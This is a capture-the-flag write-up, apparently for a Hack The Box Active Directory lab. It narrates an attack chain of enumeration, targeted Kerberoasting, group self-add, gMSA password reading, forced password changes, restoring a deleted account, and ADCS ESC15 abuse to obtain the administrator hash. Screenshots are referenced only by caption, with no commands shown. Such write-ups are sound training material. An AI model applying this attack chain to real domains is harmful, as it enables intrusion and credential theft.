Enumeration

Initial Credentials

At the start of the pentest an unprivileged user credential is given, as in every Active Directory test.

00 - initial

Nmap

Initial nmap scan revealed common ports for Active Directory.

01 - nmap

SMB Enumeration

The user could login via SMB and read IPC$ Share.

02 - shares

So I applied RID Brute forcing and created a user list.

03 - userList

BloodHound

Later I ran bloodhound python for further enumeration.

04 - bloodhound

Exploitation

From now on, there will be many lateral movements. I will explain them step by step.

WriteSPN

The initial user had writeSPN privileges over alfred. I used targetedKerberoast tool to obtain his ticket.

05 - writespn

06 - alfred ticket

Then used hashcat to crack it.

07 - cracked

AddSelf

The alfred user could add himself to Infrastructure group.

08 - addself

I used bloodyAD tool to add him to the group.

09 - added alfred

ReadGMSAPassword

The Infrastructure group had privileges to read GMSAPassword of the ansible_dev$.

10 - readgmsa

I used netexec’s gmsa module to read the password hash.

11 - gmsa read password

Force Change Password

ansible_dev$ account had ForceChangePassword privileges over sam.

12 - force change password

I used pth-net rpc to change the password. Because I only have password hash of the ansible_dev$.

13 - change

WriteOwner

The sam was writeowner of the john.

14 - writeowner

So using sam, I gained full privileges over John and changed his password.

15 - got john

User Flag

The john could PSRemote. So, I got the user flag.

16 - user flag

Privilege Escalation

The John had GenericAll privileges over ADCS OU, but that OU had no members.

17 - generic all adcs ou

Enumerating Certificates

I enumerated certificates using certipy-ad and could not find any vulnerable certificates. Then enumearted all templates and found that an SID with no name had object control over WebServer template.

19 - a template include interesting sid

Recovering Deleted AD Object

At first, I checked if the object was deleted. I ran command from this github repo.

20 - deleted object

Object was deleted and it was cert_admin user. I found this post and used commands from there to recover the object.

21 - restored it

Then ran bloodhound again and found it was in ADCS OU.

22 - it is in OU

So as john I can simply change its password.

23 - updated password for cert_admin

ADCS - ESC15

Then I ran certipy-ad again using cert_admin credentials.

24 - ran certipy

The WebServer template was vulnerable to ESC15.

25 - vulnerable

So I opened official wiki of certipy. First, I tried the method a and it did not work. Then tried method B and got the administrator hash.

26 - pfx

27 - pfx2

28 - hash

Root Flag

We got the root.

29 - got root

Pwned

Easy, peasy

30 - pwned it

<
Previous Post
BabyTwo - Hack The Box
>
Next Post
Tre - Proving Grounds Play